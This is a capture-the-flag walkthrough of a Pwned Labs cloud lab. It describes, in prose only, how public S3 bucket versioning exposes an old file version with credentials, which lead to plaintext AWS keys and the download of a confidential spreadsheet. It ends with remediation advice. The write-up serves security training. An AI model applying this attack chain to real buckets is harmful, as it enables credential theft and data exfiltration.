Leveraging S3 Bucket Versioning
A walkthrough demonstrating how S3 Bucket Versioning can lead to data exposure and exfiltration.
Last updated
A walkthrough demonstrating how S3 Bucket Versioning can lead to data exposure and exfiltration.
Last updated
CTF Source: Pwned Labs
In this walkthrough, we'll discover how improper permissions to S3 Bucket Versioning can lead to unintentional data exposure and exfiltration.
Install awscli: brew install awscli
(mac) apt install awscli
(linux)
We’re given an IP of 16.171.123.169
and after finding an open port on 443
, we find a login page in the browser.
Viewing the web page source code, we find an S3 bucket.
Navigating to the root of the S3 bucket, we can see two prefixes private
and static
Let’s try enumerating the bucket with the aws cli.
Let’s see if S3 bucket versioning has been set up.
We can also use curl
on a bucket object to view information about versioning and delete markers.
Amazon has a doc here to learn more about the headers.
In this example, I needed to replace spaces in the xlsx
file name with %20
which is called URL Encoding.
Let’s try downloading the latest file (the version without the delete marker) of Business Health - Board Meeting (Confidential).xlsx
No dice.
However, there is a newer version of the file auth.js
If we try downloading the previous file, we’ll find we’re successful and also find credentials!
Let's read the file contents.
With these credentials, we can log in to the original login page of the website. It appears to be a dashboarding app.
Poking around, we can find plaintext AWS Access Keys!
Before configuring these AWS credentials, we’ll need to know what region we’re working in. Let’s check what region the S3 bucket is in using curl
.
Great! We’re working in eu-north-1
region. Let’s set up our new AWS credentials.
Sweet! Looks like we’re the data-user
. Alright, with our new profile, let’s attempt to download that xlsx
file again.
Since I don’t have a program to open CSV files on my kali linux box, I’ll transfer the file over to my Mac.
And here’s the flag!
So, in this CTF, we discovered an S3-hosted website. Upon enumerating the bucket, we found credentials in an old file version, used those to access a company dashboard tool, and discovered plaintext AWS Access Keys leading to the exfiltration of sensitive company data. Here are some recommended actions administrators can take to prevent this from happening.
Tighten the S3 Bucket Policy
“Everyone” could perform s3:ListBucketVersions
and s3:GetObjectVersions
leading to the discovery of hard-coded credentials in the file auth.js
.
See below for a potential policy that can be used, and note this would allow access to all bucket contents (see point 2)
Eliminate S3 bucket multi-use
Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.
Since this bucket is hosting a publicly accessible website, only store files relevant to the website.
If moving data to a new location, ensure any remnants get deleted. The command below can perform this action.
Ensure employees are trained and have access to a credential manager.
In this case, an employee’s AWS Access Keys were found improperly stored in their Dashboard profile
Securely store credentials in solutions such as AWS Secrets Manager, HashiCorp Vault, or similar.